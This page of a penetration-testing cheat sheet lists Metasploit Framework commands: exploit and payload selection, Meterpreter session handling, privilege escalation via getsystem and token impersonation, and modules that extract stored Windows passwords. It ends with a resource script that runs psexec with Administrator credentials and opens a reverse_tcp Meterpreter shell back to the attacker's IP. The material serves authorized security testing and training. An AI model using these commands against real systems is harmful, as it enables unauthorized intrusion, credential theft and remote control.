d4Rk's 1337 h4x0r guide
  • Introduction
  • Reconnaissance
    • Recon
    • OSINT
  • Enumeration
    • Network discovery
    • Port scanning
    • Webserver scanning
    • Exploit detection
    • Fuzzing
    • Process monitoring
  • Exploitation
    • Shells
      • Shells
      • TTY
    • Passwords
      • Hashcat
      • John the Ripper (JTR)
      • Hydra
      • Passwords & credentials
    • Web
      • SQL injection (SQLi)
      • Cross site scripting (XSS)
      • File inclusions (LFI, RFI)
      • Directory traversal
      • Cross site request forgery (CSRF)
      • XML external entity (XXE)
      • Cross origin resource sharing (CORS)
      • Server-side request forgery (SSRF)
      • Server-side template injection (SSTI)
      • Access control vulnerabilities
      • Authentication vulnerabilities
      • JWT attacks
      • File uploads
      • Host header attacks
      • Clickjacking
      • Logic flaws
      • OS command injection
      • HTTP Request smuggling
      • Insecure deserialization
      • DOM-based
      • WebSockets
      • Web cache poisoning
    • Buffer overflow
      • General
      • Linux
      • Windows
    • Misc
      • Evasion
      • SQSH
  • Privilege escalation
    • Linux
      • Overview
    • Windows
      • Overview
      • Mimikatz
      • PowerSploit
      • Juicy Potato, Rotten Potato (NG)
      • JAWS
      • Empire
      • SILENTTRINITY
  • Post exploitation
    • Loot
    • Pivoting
    • Standalone Tools
  • Services
    • TCP
      • TCP 21: FTP
      • TCP 22: SSH
      • TCP 23: Telnet
      • TCP 25, 587: SMTP
      • TCP 53: DNS
      • TCP 80, 443: HTTP(S)
      • TCP 88: Kerberos
      • TCP 110, 995: POP3(S)
      • TCP 111: rpcbind
      • TCP 135: MSRPC
      • TCP 139, 445: NetBIOS, SMB
      • TCP 143, 993: IMAP(S)
      • TCP 389, 636, 3268, 3269: LDAP
      • TCP 1433, UDP 1434: MSSQL Server
      • TCP 2049: NFS
      • TCP 3306: MySQL
      • TCP 3389: RDP
      • TCP 5985: WinRM
      • TCP 6379: Redis
      • TCP 27017: MongoDB
    • UDP
      • UDP 137, 138, TCP 139: NetBIOS
      • UDP 161: SNMP
    • Misc
      • Active Directoy
      • Apache Tomcat
      • Drupal
      • H2 Databases
      • IIS
      • IPsec
      • IRC
      • Java Applets
      • Java RMI
      • Jenkins
      • Joomla
      • Oracle
      • PHP
      • SharePoint
      • WordPress
  • File transfer
    • Overview
    • Wget
    • Pure-FTPd
    • TFTP
    • VBScript: Wget clone
  • Misc
    • Bash
    • Burp Suite
    • Crypto
    • Ebowla
    • Firefox extensions
    • Impacket
    • Memory forensics
    • Metasploit Framework (MSF)
    • MITM
    • Msfvenom
    • Pass the Hash (PTH)
    • PowerShell
    • PowerShell on Linux
    • Wireshark
    • Wordlists and dictionaries
  • Bug Bounty
    • Platforms
    • Tools
Powered by GitBook
On this page
  • Start
  • Exploits
  • Options
  • Payloads
  • Sessions
  • Meterpreter
  • Encoders
  • Misc
  • Multi/handler
  • Jobs
  • Post exploitation
  • Meterpreter session
  • Resource Scripts
  • demo.rc
Edit on GitHub
  1. Misc

Metasploit Framework (MSF)

PreviousMemory forensicsNextMITM

Last updated 3 years ago

The world’s most used penetration testing framework

Start

Start db

msfdb start

or

systemctl start postgresql

Start metasploit framework console

msfconsole

Exploits

Select exploit

use <exploit>

Run exploit

run

or

exploit

Options

Show options

show options

Show advanced options

show advanced

Set option

set <option> <value>

Set option (global)

setg <option> <value>

Payloads

Show payloads

show payloads

Select payload

set payload <payload>

Sessions

Show sessions

sessions -h

Interact with session

sessions <number>

Send session to background

background

Meterpreter

The shell command will present you with a standard shell on the target system.

shell

Metasploit has a Meterpreter script, getsystem, that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system.

getsystem

Encoders

Show encoders

show encoders

Select encoder

set encoder <encoder>

Misc

Search for exploits

search <term>

Go back

back

Display help

help

Get info about current context?

info
show auxiliary

Multi/handler

Just start listener

use exploit/multi/handler

Jobs

Start job in background

run -j

Show jobs

jobs

Post exploitation

This module suggests local meterpreter exploits that can be used.

use post/multi/recon/local_exploit_suggester

This module extracts the plain-text Windows user login password in Registry.

use post/windows/gather/credentials/windows_autologin

This module will login with the specified username/password and execute the supplied command as a hidden process.

use post/windows/manage/run_as

Meterpreter session

Upgrade shell to meterpreter shell

post/multi/manage/shell_to_meterpreter

Migrate to other (e.g. more stable) process

migrate

Get system info

sysinfo

Port forwarding

portfwd add -l <port> -r 127.0.0.1 -p <port>

Impersonation (Windows)

Look for privileges like SeImpersonatePrivilege, SeDebugPrivilege, etc.

whoami /priv

Load incognito module and list available tokens

load incognito
list_tokens -g

Impersonate e.g. BUILTIN\Administrators

impersonate_token "BUILTIN\Administrators"

Migrate to a process with the correct permission, to actually get the elevated permissions (token != permission).

ps 
migrate <pid>

Resource Scripts

Resource scripts provide an easy way for you to automate repetitive tasks in Metasploit.

msfconsole -r demo.rc

demo.rc

use exploit/windows/smb/psexec
set rhost <ip>
set smbuser Administrator
set smbpass <hash-or-password>
set smbdomain <domain>
set payload windows/meterpreter/reverse_tcp
set AutoRunScript post/windows/manage/smart_migrate
setg lport 443
setg lhost <own-ip>
Metasploit